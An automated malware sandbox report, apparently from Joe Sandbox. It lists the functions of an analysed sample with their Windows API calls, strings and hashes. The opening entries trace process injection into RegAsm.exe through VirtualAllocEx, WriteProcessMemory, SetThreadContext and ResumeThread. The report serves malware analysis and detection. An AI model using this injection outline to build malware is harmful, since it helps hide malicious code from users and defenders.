Wow64SetThreadContext.KERNEL32(0000009C,02EE0000), ref: 0300249D
ResumeThread.KERNELBASE(0000009C), ref: 030024AC

Strings

Load, xrefs: 030021CF
SetThreadContext, xrefs: 030022B7
GetThreadContext, xrefs: 0300226B
CreateProcessA, xrefs: 03002245
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 030022FF
ress, xrefs: 0300221B
WriteProcessMemory, xrefs: 030022A4
ResumeThread, xrefs: 030022CD
aryA, xrefs: 030021D7
VirtualAllocEx, xrefs: 03002291
TerminateProcess, xrefs: 0300238F
VirtualAlloc, xrefs: 03002258
GetP, xrefs: 03002213
ReadProcessMemory, xrefs: 0300227E

Memory Dump Source

Source File: 0000000B.00000002.2737920203.0000000003002000.00000040.00000800.00020000.00000000.sdmp, Offset: 03002000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3002000_12dsvc.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: 5454b5271a93410d72ddbc0acf8a1ff322dc2c4e20303337e2b5fed292934eab
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 54B1F87664124AAFDB60CF68CC80BDA73A9FF88714F158564EA0CAB341D774FA418B94

Function 01331268 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 013312F0

Memory Dump Source

Source File: 0000000B.00000002.2737362819.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1330000_12dsvc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5b471897516ef3ed9f03d7b11100fd27118030523d60a3cca2b12689e62b60b4
Instruction ID: 7fb4a6beb6ed62cbdd4a06f7dd573151c8b178293b1b3d2830f56b817f846ff4
Opcode Fuzzy Hash: 5b471897516ef3ed9f03d7b11100fd27118030523d60a3cca2b12689e62b60b4
Instruction Fuzzy Hash: 8121F3B1C002599FCB10DFAAC884AEEBFF4FF48310F10852AE919A7250C7799944CFA1

Function 01331270 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 013312F0

Memory Dump Source

Source File: 0000000B.00000002.2737362819.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1330000_12dsvc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0b6b5bdc11b9b002d89adb27c5abe627156a220a557c0482b269ab06cd0c1d9a
Instruction ID: 952e461ffee1aff68af17982f0a06114e805bd29d81a595b635d52f032f36cc7
Opcode Fuzzy Hash: 0b6b5bdc11b9b002d89adb27c5abe627156a220a557c0482b269ab06cd0c1d9a
Instruction Fuzzy Hash: 802115B18002499FCB10DF9AC880ADEFBF4FF48310F108419E919A7250C774A944CFA1

Analysis Process: RegAsm.exePID: 1712, Parent PID: 3724COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	48

Executed Functions

Function 0041FEAF Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB65: CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

GetLastError.KERNEL32 ref: 0041FFC3
__dosmaperr.LIBCMT ref: 0041FFCA
GetFileType.KERNELBASE(00000000), ref: 0041FFD6
GetLastError.KERNEL32 ref: 0041FFE0
__dosmaperr.LIBCMT ref: 0041FFE9
CloseHandle.KERNEL32(00000000), ref: 00420009
CloseHandle.KERNEL32(?), ref: 00420156
GetLastError.KERNEL32 ref: 00420188
__dosmaperr.LIBCMT ref: 0042018F

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction ID: c043dc6610800097a8c7d9f7805d75e01504a092e95ab29a96a2aa982ce353c5
Opcode Fuzzy Hash: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction Fuzzy Hash: FCA14732A041559FCF19DF28EC91BAE3BA1AB46314F18016EF801EB3D2C7398957D759

Function 004038C0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 401
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(shell32.dll), ref: 0040390A

Strings

shell32.dll, xrefs: 00403905
.exe, xrefs: 004039E4, 004039F5, 00403C28, 00403C39
open, xrefs: 00403E04, 00403E25

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .exe$open$shell32.dll
API String ID: 1029625771-3690275032
Opcode ID: c9f59ac015d61ec70614d93d888e022ef416f64b299715dc7f56bdbe0cac2894
Instruction ID: 7d5b2598125341daaadbafcfaee473a7e4c633bdeea8f021ad5caa46309aa23f
Opcode Fuzzy Hash: c9f59ac015d61ec70614d93d888e022ef416f64b299715dc7f56bdbe0cac2894
Instruction Fuzzy Hash: EFE12A712083408BD718CF28CC45B6FBBE5BF85305F244A2DF489AB2D2D779E6458B5A

Function 00411432 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0041142C,00000016,0040BD98,?,?,3037F390,0040BD98,?), ref: 00411443
TerminateProcess.KERNEL32(00000000,?,0041142C,00000016,0040BD98,?,?,3037F390,0040BD98,?), ref: 0041144A
ExitProcess.KERNEL32 ref: 0041145C

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction ID: 3fe6f93935658f8ab67006e652a10cd0383134051074610e396dae59c432ecd7
Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction Fuzzy Hash: 5DD09E31100148ABCF117F61EC0DA993F2AAF407557858025FA0A56131CB369993AA58

Function 00416DAF Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004164C2: GetConsoleOutputCP.KERNEL32(3037F390,00000000,00000000,0040BDB8), ref: 00416525

WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC75,00000000,00000000,00000000,00000000,?,?,0040BC75,?,?,004328B8,00000010,0040BDB8), ref: 00416F18
GetLastError.KERNEL32(?,0040BC75,?,?,004328B8,00000010,0040BDB8,?,?,00000000,?), ref: 00416F22

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction ID: cb585fdb2482b244a4d3bef91fab55670e651a1c55327e645a67e42ff2a15e13
Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction Fuzzy Hash: 4461D775D04249AFDF10CFA8C844AEF7FB9AF09308F16415AF804A7252D379D986CB69

Function 00403EE0 Relevance: 3.0, APIs: 2, Instructions: 22
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004038C0,00000000,00000000,3037F390), ref: 00403F06
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403F0F

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction ID: 9ada69c4f7ca39928594594d106047c4e65b58e1a3541a0c5f1fc3d2bb6a9bfa
Opcode Fuzzy Hash: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction Fuzzy Hash: 10E08675758300BBD710EF24EC07F1A3BE4BB48B05F914A39F295A62D0D674B404965E

Function 00414D5D Relevance: 2.6, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DB3
GetLastError.KERNEL32(?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DBD

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction ID: ceb111eb948f9657ebdeceefd9bfba8073a9b29251fc9eed98a790ab6a2c0bec
Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction Fuzzy Hash: 06114C336041241ADB246635BC867FE6749CBC1738F290A5FF808C72C1DE388CC2929C

Function 004143CC Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction ID: d7b25293e7db54f96000769fea1aeb7630fb582f3d7d0c2fc2c622193e8995c8
Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction Fuzzy Hash: 620128373002255F9F25CF6EEC40ADB33A6FBC07243148136FA20CB684DA34D8829799

Function 00413EF2 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00413F2C

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
Instruction ID: be02312cd07e58b193bdeee16c95f5fde802225de20a5ed1c7ae4422ede983e8
Opcode Fuzzy Hash: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
Instruction Fuzzy Hash: 46110375A0420AAFCB05DF58E9419DB7BF9EF48304F04406AF809AB351D630EA15CBA8

Function 0041FB65 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94

Non-executed Functions

Function 0041EBA1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC3A
GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC63
GetACP.KERNEL32(?,?,0041EEBF,?,00000000), ref: 0041EC78

Strings

ACP, xrefs: 0041EBBF
OCP, xrefs: 0041EBF5

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction ID: 81a9d30784dd22d719d41cfb92251f6e816e7a4bc62bdb22216d11a6fc444572
Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction Fuzzy Hash: 92218E3AB04101AADB34CF56CD05AD773A7AF50B50B568826FD0AD7211F736EE81C798

Function 0041ED76 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE82
IsValidCodePage.KERNEL32(00000000), ref: 0041EECB
IsValidLocale.KERNEL32(?,00000001), ref: 0041EEDA
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF22
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF41

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction ID: eeabbf5cfaddba79e94d22b4dd48aaeada7d5b667952b3c456454f902e5df75d
Opcode Fuzzy Hash: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction Fuzzy Hash: B4519075A00315ABDF20DFA6DC41BEB77B8FF48700F54442AAD14E7290E7789980CB69

Function 0041E412 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetACP.KERNEL32(?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4D3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4FE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661

Strings

utf8, xrefs: 0041E5D0

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction ID: 5e8f11e88951c7c1c9557d61489bca48d24d80555c5ca4e9e4b82e7d51b65768
Opcode Fuzzy Hash: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction Fuzzy Hash: 8F711775A00611AADB24AB77CC42BE773A8EF54708F14442BFD05D7281FB7CE9818799

Function 00415635 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004156C2

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction ID: 91afe31f9ab3d507f6121463a8ee3d13cfef47ac4a512e863f990cc27fdcea00
Opcode Fuzzy Hash: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction Fuzzy Hash: 92B15872E00645DFDB119F68C891BEEBBE5EF85310F14816BE815AB341D2389D81CBA9

Function 00407B01 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407B0D
IsDebuggerPresent.KERNEL32 ref: 00407BD9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BF9
UnhandledExceptionFilter.KERNEL32(?), ref: 00407C03

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction ID: ca20a48664bdef0e78e9b146848890f6e34f40b99dedcfcf476291c653997e40
Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction Fuzzy Hash: 1B314B75D0521CDBDF20DFA0D9497CDBBB8BF04304F1040AAE50DA7290EB756A859F09

Function 0041E825 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E879
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E8C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E989

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
Instruction ID: efc99f0a6d6f1c6c35933ec1b38cf6b3cd41524c9fcadcabef19194d257b4763
Opcode Fuzzy Hash: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
Instruction Fuzzy Hash: EB618CB59101079BDB689F26CD82BEA77A8FF04340F14417BED16C6281F738D981DB58

Function 0040DD78 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0040DE70
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0040DE7A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0040DE87

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
Instruction ID: 2886232a598c6d0739cb6745ed5e05dca1263a9451a5c599d013a0f88592b0f0
Opcode Fuzzy Hash: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
Instruction Fuzzy Hash: 4131E574D012189BCB21DF69D98878DBBB8BF08310F5041EAE41CA7291E774AF858F48

Function 004077E0 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004077F6

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 96a2ba3aa580dc615e5e38e6a61e3a4296c942238419a14d8ec0a8789d2e52c4
Instruction ID: 853601205c21894bcdc8f75123652b739dccbac0e00907a06a8c71bf04373a9d
Opcode Fuzzy Hash: 96a2ba3aa580dc615e5e38e6a61e3a4296c942238419a14d8ec0a8789d2e52c4
Instruction Fuzzy Hash: 865180B2E056059FEB18CF54E9857AEBBF0FB48350F14913AD501EB390D378A940CB59

Function 0041B6EA Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7be1b563e95d33199e7689ec4de1d78c2bffa075c9047012787a74e04073e273
Instruction ID: e26fa8b462e3a3bc0dcd1cb195ad12d8a73a1b261898cc61817e46cff9ff25aa
Opcode Fuzzy Hash: 7be1b563e95d33199e7689ec4de1d78c2bffa075c9047012787a74e04073e273
Instruction Fuzzy Hash: 9841A3B5804219AEDB20DF69CC89AEEBBB9EF45304F1441EEE418D3201DB359E858F54

Function 0041EA78 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041EACC

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
Instruction ID: 09566a44d01ac47d2cdad9f49e07ec0328cace9eeb3adbfa8c3b07b4827ecd72
Opcode Fuzzy Hash: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
Instruction Fuzzy Hash: D321AF36605206ABDB28DE26DD42AFB73A8EF44314B10407FED02D6241EB78AD81CB58

Function 0041E6FF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041E825,00000001,00000000,?,-00000050,?,0041EE56,00000000,?,?,?,00000055,?), ref: 0041E771

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
Instruction ID: f28f85ac1fea5866725ce88a4d547c14bcace0560233e7335010750b785556cb
Opcode Fuzzy Hash: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
Instruction Fuzzy Hash: F0112C3A6007019FEB189F3AD8916FAB791FF80368B14442ED95747740E7757843C744

Function 0041ECA7 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041EB22,00000000,00000000,?), ref: 0041ECD3

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction ID: 6e93bce3e8a9596dc076f6a872b53f7d727095e2315f943068ff1bd0afa52940
Opcode Fuzzy Hash: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction Fuzzy Hash: 56F02D3A600113BFDB245B26EC09BFB7764EB40354F19442AEC06A3280EA78FDC2C694

Function 0041E60D Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661

Strings

utf8, xrefs: 0041E5D0

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
Instruction ID: d369d087f973f2c2e7390e19339e1b86590d8fa7fa541369cb1b30fd3d4077c9
Opcode Fuzzy Hash: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
Instruction Fuzzy Hash: B0F0F436A10105ABC714AF25DC45FFA73A8EB84324F40007EAA02D7281EA78AD418758

